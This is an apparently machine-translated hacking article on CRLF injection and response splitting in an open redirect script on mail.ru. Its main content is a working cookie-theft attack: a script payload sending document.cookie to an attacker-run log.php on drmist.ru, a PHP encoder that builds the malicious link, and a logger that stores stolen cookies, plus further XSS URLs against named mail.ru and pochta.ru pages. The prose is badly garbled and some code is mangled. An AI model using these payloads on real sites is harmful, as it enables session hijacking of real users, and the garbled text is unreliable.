| Wandering through the Internet, we often observe the url of the form http://anyhost.com/redirect.php?url=http://otherhost.com A simple-minded user, without long thinking, just clicks on it also pleases on otherhost.com.
An inquisitive user submits the address of his hompagi to the url's location, and also makes sure that the script is crooked.
In addition to the simple curious on the Internet live very curious users.
They drive in a link in AccessDiver also starting to learn how the script works.
1. The essence of the bug.
2. Practical application.
3. The location of the prevalence of error.
4. Means of protection.
for tankers, I’m suggesting that AccessDiver is “hakresky,” as is customary to express in a nation, an instrument. Download it allowed on the offsite project. At the time of this writing, the latest version of the utility was 4.173. The program is best known for its HTTP debuger function. You can use it by going into expert mode by also selecting the appropriate function in the Tools menu (F4 then Ctr + F9 - depending on the version, they could be changed). Then we will not emphasize the concern of its setting, any schoolboy can cope with a diver.
for experiments, we chose mail.ru , since this is the most famous postal service in runet, and the reader will be particularly interested to learn about the bug on this project;) Let's follow the link http://go.mail.ru/urltracker?url=http:/ /www.security-teams.net . We will transfer to the most chosen portal on computer security;). We add the site to the bookmarks and return to the mail. Let's write down the link that interests us in the HTTP Address field, set the Mode to Get, click Connect.
Before us will appear HTTP headers returned by the server, approximately as in the screenshot:
Let us take care of the underlined line. Having met Location: headers, the browser unconditionally takes us to the specified url. Consequently, we can slip a link to the user, as if on a mail, but he will get nothing at all on the mail. All this is wonderful, but in practice nothing alienates.
Note that the lines in the header are separated by two characters 0Dh 0Ah . And what, if attributed to them at the end of the link? Let's see what the server will give us back to the objection to the request http://go.mail.ru/urltracker?url=null%0D%0AHacked_by:%20drmist :
How interesting. So we can force the server to produce almost any header. For example, modify user cookies. But, again, this is still not as interesting as the fact that hesitates us ahead. Interestingly, the headers are separated from the body of the act by the sequence 0Dh 0Ah 0Dh 0Ah . Are we able to give full any page? Enter http://go.mail.ru/urltracker?url=% 0D% 0A% 0D% 0A <script> alert (document.cookie); </ script> <! - also look at:
1) Create a page like <script> document.location = 'http://drmist.ru/log.php?'+document.cookie; </ script>
2) Translate it into url-encode using a script:
$ url = "http://go.mail.ru/urltracker?url=";
$ s = "<script> document.location = 'http: //drmist.ru/log.php?'";
$ s. = "+ document.cookie; </ script>";
$ res = "";
for ($ i = 0; $ i <strlen ($ s); $ i ++)
$ res. = "%";
$ t = ord ($ s [$ i]);
if ($ t <16)
$ res. = "0";
$ res. = dechex ($ t);
echo $ url. "% 0d% 0a% 0d% 0a". $ res;
http://go.mail.ru/urltracker?url=%0d%0a%0d%0a%3c%73%63 ... etc.
3) write a script log.php also upload it to drmist.ru:
$ fid = fopen ("../ log.txt", "a");
fputs ($ fid, $ _SERVER ["QUERY_STRING"]. "\ r \ r \ r");
fclose ($ fid);
header ("Location: http://www.mail.ru");
Now it is allowed to send a magic link (**) to purchase the victim’s cookies.
They are allowed to do a lot of useful things, for example, to get access to the mail, but about this some other time, we also distracted ourselves so much from the main topic.
Of course, it is not necessary to drive to the email that it is a great resource, shit, and it’s not from our sandbox either. It’s common for all people to make a mistake, but mail.ru admins make mistakes less and less often. True bugs still remain. , people are silent about them not because of greed, but because of the fear of inadequate reaction of the administration to their finding, which, according to statistics, owns the place. Fortunately, the presence of XSS does not guarantee access to the mailbox. I'm sure the bug will be closed. After 2 days at the latest. Vulnerable not only mail.ru. I strongly recommend to read:
Frankly, we were very surprised at what time I learned that such vulnerabilities were written on securitylab.ru 3 years ago (see CRLF implementation in the PHP header () function from September 10, 2002), but since we don’t I have never heard it, but I found the topic relevant. In addition, blah blah vryatli allowed to call in any way relevant the presence of bugs on Yandex, Rambler also email.
Correct the error is not difficult. Let him eat the vulnerable script:
if (! isset ($ url))
$ url = "http://www.mail.ru";
header ("Location: $ url");
We make him invulnerable:
header ("Location:" .urlencode ($ url));
If the redirect is planned only within the site, then it is best to do this:
header ("Location: http://www.mail.ru/".urlencode( $$url));
Here perhaps also everything that we wanted to report. Let me offer some more XSS:
http://talk.mail.ru/article.html?ID=31836089&page=1 "> <h1> XSS </ h1>
http://www.pochta.ru/?lng=en "<h1> XSS </ h1>